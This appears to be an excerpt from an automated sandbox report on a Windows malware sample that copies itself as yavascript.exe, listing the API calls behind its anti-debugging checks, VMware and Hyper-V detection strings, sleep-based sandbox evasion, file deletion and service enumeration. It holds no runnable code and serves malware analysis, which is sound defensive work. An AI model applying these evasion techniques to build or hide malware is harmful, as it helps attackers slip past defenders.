Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040F7A7 Sleep,ExitProcess,	0_2_0040F7A7
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0213FA0E Sleep,ExitProcess,	0_2_0213FA0E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040F7A7 Sleep,ExitProcess,	15_2_0040F7A7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0073FA0E Sleep,ExitProcess,	15_2_0073FA0E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040F7A7 Sleep,ExitProcess,	20_2_0040F7A7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F8FA0E Sleep,ExitProcess,	20_2_01F8FA0E

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	0_2_0041A748
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	0_2_0214A9AF
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	15_2_0041A748
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	15_2_0074A9AF
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	20_2_0041A748
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	20_2_01F9A9AF

Source: C:\Users\user\AppData\Roaming\yavascript.exe

Window / User API: threadDelayed 9632

Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Evaded block: after key decision			graph_0-88378
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Evaded block: after key decision			graph_0-88349

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	API coverage: 4.6 %
Source: C:\Users\user\AppData\Roaming\yavascript.exe	API coverage: 6.3 %
Source: C:\Users\user\AppData\Roaming\yavascript.exe	API coverage: 4.4 %

Source: C:\Users\user\AppData\Roaming\yavascript.exe TID: 5032	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe TID: 5032	Thread sleep time: -897000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe TID: 5032	Thread sleep count: 9632 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe TID: 5032	Thread sleep time: -28896000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_00409253
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_0041C291
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_0040C34D
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_00409665
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0044E879 FindFirstFileExA,	0_2_0044E879
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	0_2_0040880C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040783C FindFirstFileW,FindNextFileW,	0_2_0040783C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00419AF5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0040BB30
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_0040BD37
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214C4F8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_0214C4F8
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0213C5B4 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_0213C5B4
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02138A73 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	0_2_02138A73
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02137AA3 FindFirstFileW,FindNextFileW,	0_2_02137AA3
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0217EAE0 FindFirstFileExA,	0_2_0217EAE0
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_021398CC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_021398CC
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02149D5C FindFirstFileW,	0_2_02149D5C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0213BD97 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_0213BD97
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409253
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0041C291
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0040C34D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409665
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0044E879 FindFirstFileExA,	15_2_0044E879
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_0040880C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040783C FindFirstFileW,FindNextFileW,	15_2_0040783C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00419AF5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040BD37
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074C4F8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0074C4F8
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0073C5B4 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0073C5B4
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_007398CC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_007398CC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00738A73 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_00738A73
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0077EAE0 FindFirstFileExA,	15_2_0077EAE0
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00737AA3 FindFirstFileW,FindNextFileW,	15_2_00737AA3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00749D5C FindFirstFileW,	15_2_00749D5C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0073BD97 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0073BD97
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	20_2_00409253
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	20_2_0041C291
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	20_2_0040C34D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	20_2_00409665
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0044E879 FindFirstFileExA,	20_2_0044E879
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	20_2_0040880C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040783C FindFirstFileW,FindNextFileW,	20_2_0040783C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	20_2_00419AF5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	20_2_0040BB30
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	20_2_0040BD37
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F8C5B4 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	20_2_01F8C5B4
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9C4F8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	20_2_01F9C4F8
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F898CC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	20_2_01F898CC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FCEAE0 FindFirstFileExA,	20_2_01FCEAE0
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F87AA3 FindFirstFileW,FindNextFileW,	20_2_01F87AA3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F88A73 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	20_2_01F88A73
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F8BD97 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	20_2_01F8BD97
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F99D5C FindFirstFileW,	20_2_01F99D5C

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

0_2_00407C97

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: yavascript.exe, 0000000F.00000002.4474688472.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Roaming\yavascript.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004349F9

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

0_2_0041CB50

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004432B5 mov eax, dword ptr fs:[00000030h]	0_2_004432B5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_006546CB push dword ptr fs:[00000030h]	0_2_006546CB
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0217351C mov eax, dword ptr fs:[00000030h]	0_2_0217351C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0213092B mov eax, dword ptr fs:[00000030h]	0_2_0213092B
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02130D90 mov eax, dword ptr fs:[00000030h]	0_2_02130D90
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004432B5 mov eax, dword ptr fs:[00000030h]	15_2_004432B5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00554073 push dword ptr fs:[00000030h]	15_2_00554073
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0077351C mov eax, dword ptr fs:[00000030h]	15_2_0077351C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0073092B mov eax, dword ptr fs:[00000030h]	15_2_0073092B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00730D90 mov eax, dword ptr fs:[00000030h]	15_2_00730D90
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004432B5 mov eax, dword ptr fs:[00000030h]	20_2_004432B5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_005D8A4B push dword ptr fs:[00000030h]	20_2_005D8A4B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FC351C mov eax, dword ptr fs:[00000030h]	20_2_01FC351C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F8092B mov eax, dword ptr fs:[00000030h]	20_2_01F8092B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F80D90 mov eax, dword ptr fs:[00000030h]	20_2_01F80D90

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_00412077 GetProcessHeap,HeapFree,

0_2_00412077

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004349F9
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00434B47 SetUnhandledExceptionFilter,	0_2_00434B47
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043BB22
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00434FDC
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02165243 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_02165243
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02164C60 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_02164C60
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0216BD89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0216BD89
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_004349F9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00434B47 SetUnhandledExceptionFilter,	15_2_00434B47
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0043BB22
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00434FDC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00765243 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00765243
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00764C60 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00764C60
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0076BD89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0076BD89
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_004349F9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00434B47 SetUnhandledExceptionFilter,	20_2_00434B47
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0043BB22
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_00434FDC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FB5243 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_01FB5243
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FBBD89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_01FBBD89
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FB4C60 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_01FB4C60

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	0_2_004120F7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	15_2_004120F7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	20_2_004120F7

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_00419627 mouse_event,

0_2_00419627

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Process created: C:\Users\user\AppData\Roaming\yavascript.exe "C:\Users\user\AppData\Roaming\yavascript.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_00434C52 cpuid

0_2_00434C52

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_00452036
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_004520C3
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,	0_2_00452313
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_00448404
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0045243C
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,	0_2_00452543
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00452610
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoA,	0_2_0040F8D1
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,	0_2_004488ED
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00451CD8
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_00451F50
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_00451F9B
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_02182202
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_0218229D
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_021821B7
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: EnumSystemLocalesW,	0_2_0217866B
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_021826A3
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,	0_2_021827AA
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,	0_2_0218257A
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoA,	0_2_0213FB38
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetLocaleInfoW,	0_2_02178B54
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_02182877
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_02181F3F
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_00452036
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_004520C3
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	15_2_00452313
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_00448404
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_0045243C
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	15_2_00452543
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_00452610
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoA,	15_2_0040F8D1
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: GetLocaleInfoW,	15_2_004488ED
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_00451CD8
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_00451F50
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: EnumSystemLocalesW,	15_2_00451F9B
